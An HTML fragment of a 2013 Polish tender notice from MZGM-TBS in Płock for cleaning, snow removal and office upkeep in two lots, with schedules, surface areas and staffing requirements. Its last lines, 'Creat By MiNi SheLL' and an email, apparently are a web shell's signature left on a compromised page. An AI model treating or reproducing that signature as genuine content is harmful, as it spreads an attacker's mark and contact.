<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzgm-plock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o. 09-400 Płock ul. Polna 7 p. 32 w godz. 7:30do 15:30 po wcześniejszym uiszczeniu kwoty 18,82 zł brutto za jej wydanie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2013 godzina 09:30, miejsce: Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o. 09-400 Płock ul. Polna 7 pokój nr 1 (kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie porządku i czystości wewnątrz budynków i pomieszczeń biurowych oraz na przyległych terenach przydomowych i osiedlowych, w zakresie wynikającym z obowiązujących przepisów, w tym prawa miejscowego, stanowiących własność Miejskiego Zakładu Gospodarki Mieszkaniowej  TBS Sp. z o. o. w Płocku (bez budynku i terenu przyległego przy ul. Polnej 7).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy zakres prac - Część I: Utrzymanie porządku i czystości wewnątrz budynków i pomieszczeń biurowych oraz na przyległych terenach przydomowych i osiedlowych, w zakresie wynikającym z obowiązujących przepisów, w tym prawa miejscowego, stanowiących własność Miejskiego Zakładu Gospodarki Mieszkaniowej  TBS Sp. z o. o. w Płocku (bez budynku i terenu przyległego przy ul. Polnej 7)
Zakres prac będących przedmiotem zamówienia rozliczanych stawką ryczałtową za 1 m2 powierzchni obejmuje w szczególności:

a. Utrzymanie porządku  i czystości wewnątrz budynków:
Uwaga: Usługa będzie wykonywana od poniedziałku do piatku każdego tygodnia a w pozostałe dni tygodnia (w tym święta) po otrzymaniu telefonicznego zgłoszenia od administratora

1. Codzienne sprzątanie klatek schodowych, podestów, korytarzy, schodów wejściowych do budynków - zamiatanie (również pod wycieraczkami - powierzchnia ujęta w wykazach), zbieranie odpadów i miejscowe zmywanie, usuwanie pajęczyn oraz (w uzgodnieniu z ROM) nieaktualnych ogłoszeń i ulotek reklamowych.
2. Mycie raz w miesiącu: drzwi wejściowych do budynku, klatki schodowej, balustrad schodowych oraz tablic informacyjnych, skrzynek umieszczonych wewnątrz i na zewnątrz budynku. 
3. Mycie minimum dwa razy do roku kloszy na klatkach schodowych.
b. Utrzymanie porządku i czystości na terenach przydomowych i osiedlowych:
1. Codzienne sprzątanie chodnika wzdłuż budynku, dojść do budynku, do śmietnika i innych powierzchni utwardzonych oraz terenów zielonych.
2. Codzienne sprzątanie altan śmietnikowych i terenu wokół altan śmietnikowych, wolnostojących pojemników lub kontenerów oraz pojemników do selektywnej zbiórki odpadów komunalnych z odpadów.
3. Codzienne kontrolowanie wypełnienia pojemników na nieczystości stałe, segregowane oraz podejmowanie działań zmierzających do efektywnego gromadzenia tych nieczystości poprzez przegarnianie i ubijanie w pojemnikach,
4. Systematyczne usuwanie chwastów przy opaskach budynków i ciągach komunikacyjnych z wywiezieniem i utylizacją,
5. Systematyczne usuwanie zgrabianych liści z terenów zewnętrznych (również przy żywopłotach) z wywiezieniem i utylizacją.
6. Usuwanie śniegu z ciągów komunikacyjnych* do godz. 6 rano (opad nocny) oraz w ciągu 3 godzin od ustania opadów (opad dzienny). Usuwanie śniegu należy przeprowadzić na całej szerokości ciągów komunikacyjnych. Zapobieganie skutkom gołoledzi poprzez posypywanie ciągów 


komunikacyjnych należących do nieruchomości, zakupionym i dowiezionym na koszt własny piaskiem bądź skuwanie miejsc oblodzonych oraz stałe utrzymywanie drożności odpływu z chodników wody z topniejącego śniegu i lodu.
Objaśnienia:
* Przez ciągi komunikacyjne rozumie się: chodniki, dojścia, podesty i schody wejściowe do klatek schodowych, dojścia do altan śmietnikowych, parkingi i dojazdy do nich, miejsca postojowe, przejazdy między kompleksami garaży oraz uliczki osiedlowe.

c. Współpraca z administracją (z Rejonem Obsługi Mieszkańców)

1. Rozwieszanie na klatkach schodowych budynków zatwierdzonych miesięcznych harmonogramów utrzymania porządku i czystości wewnątrz budynku.
2. Niezwłoczne zawiadamianie o dostrzeżonych uszkodzeniach lub wadliwym działaniu instalacji i urządzeń technicznych oraz o przypadkach dewastacji i naruszania przez mieszkańców regulaminu porządku domowego,
3. Wywieszanie flag w dniach uroczystości państwowych oraz ich zdejmowanie,
4. Niezwłoczne doręczanie korespondencji otrzymanej od Rejonu Obsługi Mieszkańców do lokali znajdujących się w budynkach wykazanych w Załącznikach wg zasady: Wykonawca dwukrotnie podejmuje próbę doręczenia korespondencji. W przypadku braku lokatora lub odmowy złożenia podpisu na wykazie doręczeń lub kopii pisma roznoszący dokonuje zapisu: brak lokatora, data...godz...- podpis czytelny osoby roznoszącej; lokator odmówił podpisu data...godz...- podpis czytelny osoby roznoszącej.
5. Przekazanie Zamawiającemu danych kontaktowych Wykonawcy w celu umożliwienia mieszkańcom i użytkownikom budynków zgłoszeń w przypadkach nie wywiązywania się z w/w zakresu.
6. Wywieszanie na klatkach schodowych nazwy firmy sprzątającej oraz danych teleadresowych Wykonawcy. 

d. Utrzymanie porządku i czystości w pomieszczeniach biurowych.

Uwaga: Usługa będzie wykonywana w dni robocze od godz. 1530

1. Czynności wykonywane codziennie:

a) zmywanie na mokro podłóg przy użyciu środków czyszczących i bieżąca konserwacja
powłok,
b) wycieranie kurzu z mebli i urządzeń biurowych (komputery wraz z klawiaturą + drukarki +
aparaty telefoniczne) oraz z parapetów,
c) usuwanie śmieci, czyszczenie koszy i wymiana worków - zakupionych i dowiezionych na koszt własny, czyszczenie koszy,
d) mycie luster,
e) czyszczenie pomieszczeń i armatury sanitarnej,
f) uzupełnienie środków czystości - zakupionych i dowiezionych na koszt własny -  w toaletach (papier toaletowy biały, mydło w płynie, kostki dezynfekujące do muszli),

2.    Czynności wykonywane raz w tygodniu:

a)    dezynfekcja urządzeń sanitarnych i armatury.

3. Czynności wykonywane raz w miesiącu:

a) wycieranie kurzu z kontaktów prądu i wyłączników oświetlenia,
b) mycie drzwi wejściowych, drzwi wewnętrznych i futryn, 
c) odkurzanie tapicerki mebli,
d) mycie glazury i lamperii w pomieszczeniach sanitarnych i szczegółowa ich dezynfekcja,


 4. Czynności wykonywane minimum dwa razy do roku:
       a)   mycie okien oraz powierzchni przeszklonych wewnątrz pomieszczeń biurowych,
       b)   mycie grzejników.
         
     5. Na wezwanie Zamawiającego, 0,5 h serwis wewnątrz budynku w godz. 1000 -  1200,  w okresie jesienno - zimowym: styczeń - marzec, październik - grudzień.
 
	Integralną częścią przedmiotu zamówienia jest -Wykaz budynków i terenów , w których wykonywana będzie przedmiotowa usługa:

Wykaz budynków i terenów - ROM III		- Załącznik Nr 10
Wykaz budynków i terenów - ROM IV		- Załącznik Nr 11
Wykaz budynków i terenów - ROM V		- Załącznik Nr 12
Wykaz altan śmietnikowych			- Załącznik Nr 15

	Łączna rzeczywista powierzchnia do sprzątania w budynkach - 582,79 m2, łączna powierzchnia w budynkach po przeliczeniu przez współczynniki korygujące -   566,49 m2.
	Łączna rzeczywista powierzchnia do sprzątania terenów przyległych - 14 135,60 m2, łączna powierzchnia terenów przyległych po przeliczeniu przez współczynniki korygujące  -   8 320,37 m2.
	Łączna ilość altan śmietnikowych -  szt. 2
	Ogółem rzeczywista powierzchnia do sprzątania:  14 718,39  m2.
	Ogółem powierzchnia skorygowana o współczynniki określone w Załączniku Nr 14 pn. Tabela współczynników korygujących:   8 886,86   m2.

Uwaga: powierzchnia skorygowana o współczynniki określone w w/w Załączniku jest  podstawą do określenia ceny 1 m2 wskazanego w ofercie.

	Do realizacji przedmiotowej usługi w ramach poszczególnych ROM - ów, Wykonawca musi dysponować niżej wymienioną ilością osób:
				
1. ROM III	co najmniej   1  osoba				
2. ROM IV	co najmniej   2  osoby		
3. ROM V	co najmniej   3  osoby

Łącznie: co najmniej 6 osób.

Zamawiający wymaga dodatkowo, by Wykonawca dysponował 1 osobą do nadzoru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.91.00-3, 90.91.92.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Utrzymanie porządku i czystości wewnątrz pomieszczeń biurowych w budynku przy ulicy Polnej 7 oraz na przyległym terenie, w zakresie wynikającym z obowiązujących przepisów, w tym prawa miejscowego, stanowiących własność Miejskiego Zakładu Gospodarki Mieszkaniowej - TBS Sp.  z o. o. w  Płocku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy zakres prac - Część II: Utrzymanie porządku i czystości wewnątrz pomieszczeń biurowych w budynku przy ulicy Polnej 7 oraz na przyległym terenie, w zakresie wynikającym z obowiązujących przepisów, w tym prawa miejscowego, stanowiących własność Miejskiego Zakładu Gospodarki Mieszkaniowej - TBS Sp.  z o. o. w  Płocku

Zakres prac będących przedmiotem zamówienia rozliczanych stawką ryczałtową za 1 m2 powierzchni obejmuje w szczególności:

a.  Utrzymanie porządku i czystości wewnątrz budynku:

Uwaga: Usługa będzie wykonywana w dni robocze od godz. 1530

1. Czynności wykonywane codziennie:
a) zmywanie na mokro podłóg przy użyciu środków czyszczących i bieżąca konserwacja powłok,
b) odkurzanie wykładzin dywanowych, 
c) wycieranie kurzu z mebli i urządzeń biurowych (komputery wraz z klawiaturą + drukarki + aparaty telefoniczne) oraz z parapetów,

d) usuwanie śmieci i wymiana worków - zakupionych i dowiezionych na koszt własny, czyszczenie koszy,
e) mycie luster,
f) czyszczenie pomieszczeń sanitarnych i armatury,
g) uzupełnienie środków czystości - zakupionych i dowiezionych na koszt własny - w toaletach (papier toaletowy biały, mydło w płynie, kostki dezynfekujące do muszli),
h) mycie naczyń znajdujących się w sekretariacie, 

      2.  Czynności wykonywane raz w tygodniu:

      a)  dezynfekcja urządzeń sanitarnych i armatury.

      3.  Czynności wykonywane raz w miesiącu:
a) wycieranie kurzu z kontaktów prądu i wyłączników oświetlenia,
b) mycie drzwi wejściowych, drzwi wewnętrznych i futryn, 
c) odkurzanie tapicerki mebli,
d) mycie glazury w pomieszczeniach sanitarnych i szczegółowa ich dezynfekcja,
e) gruntowne mycie i konserwacja podłóg z tworzywa sztucznego środkami z domieszką akrylanów, 
f) odkurzanie wszystkich sprzętów znajdujących się na korytarzach jak gabloty, obrazy, gaśnice p.poż. i inne.
g) czyszczenie balustrad,

       4.  Czynności wykonywane raz na kwartał:

a) maszynowe czyszczenie powierzchni podłóg z tworzywa sztucznego wraz z wymianą powłoki akrylowanej oraz utwardzaniem powierzchni akrylowych w wysokiej temperaturze metodą polerowania high speed,
b) mycie paneli ściennych,

      5.  Czynności wykonywane minimum dwa razy w roku:

a) mycie okien oraz powierzchni przeszklonych wewnątrz pomieszczeń biurowych,
b) mycie grzejników.

    6. Na wezwanie Zamawiającego, 0,5 h serwis wewnątrz budynku w godz. 1000 -  1200,  w okresie jesienno - zimowym: styczeń - marzec, październik - grudzień.
 
b.  Utrzymanie porządku i czystości na przyległym terenie do budynku przy ul.  Polnej 7:

1. Codzienne sprzątanie śmieci z ogrodzonego terenu i dojścia do budynku,
2. Codzienne opróżnianie kosza na śmieci zlokalizowanego przed budynkiem,
3. Systematyczne usuwanie chwastów z terenu utwardzonego wokół budynku do ogrodzenia oraz na całej długości chodnika wzdłuż ogrodzenia.
4. Raz w tygodniu pozamiatanie terenu utwardzonego do ogrodzenia,
5. W okresie jesiennym raz w tygodniu zgrabienie liści z ogrodzonego terenu wokół budynku wraz z wywiezieniem i utylizacją.

c. Utrzymanie porządku i czystości na przyległym terenie do budynku przy ul. Polnej 7 w okresie   zimowym.
1. Usuwanie śniegu z ciągów komunikacyjnych terenu ogrodzonego, utwardzonego oraz na całej długości chodnika wzdłuż ogrodzenia: do godz. 700 rano (opad nocny) oraz w ciągu 3 godzin od ustania opadów (opad dzienny) do godz. 1530  w następujące dni tygodnia: poniedziałek, wtorek, środa, piątek oraz do godz. 1730 w czwartek.
2. Usuwanie śniegu (bez jego wywozu) należy przeprowadzić na całej szerokości ciągów komunikacyjnych. 

3. Zapobieganie skutkom gołoledzi poprzez posypywanie chodnika, dojścia do budynku, dojścia do pojemnika na śmieci, parkingu i dojazdu do niego zakupionym i dowiezionym na koszt własny piaskiem, skuwanie miejsc oblodzonych oraz stałe utrzymanie drożności odpływu z chodnika, parkingu i powierzchni utwardzonej wody z topniejącego śniegu i lodu.

	Łączna rzeczywista powierzchnia do utrzymania porządku i czystości wewnątrz pomieszczeń biurowych w budynku przy ulicy Polnej 7 - 952,78 m2, łączna powierzchnia do utrzymania porządku i czystości wewnątrz pomieszczeń biurowych w budynku przy ulicy Polnej 7 po przeliczeniu przez współczynniki korygujące - 808,29 m2.
	Łączna rzeczywista powierzchnia do  utrzymania porządku i czystości terenu przyległego - 934,56 m2, łączna powierzchnia terenu przyległego po przeliczeniu przez współczynniki korygujące  - 507,30 m2,           w tym pow. utwardzona wraz z chodnikiem: 471,81 m2 oraz pow. terenu zielonego wraz z trawnikiem: 35,49  m2.
Integralną częścią przedmiotu zamówienia jest Wykaz pomieszczeń biurowych budynku przy ul. Polnej 7 oraz przyległego do budynku terenu, stanowiących zasób własny MZGM-TBS Sp. z o.o. w Płocku Załącznik Nr 16.
Uwaga: powierzchnia skorygowana o współczynniki określone w  Załączniku Nr 14 jest  podstawą do określenia ceny 1 m2 wskazanego w ofercie.

	Do realizacji przedmiotowej usługi Wykonawca musi dysponować co najmniej 1 osobą.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.91.00-3, 90.91.92.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com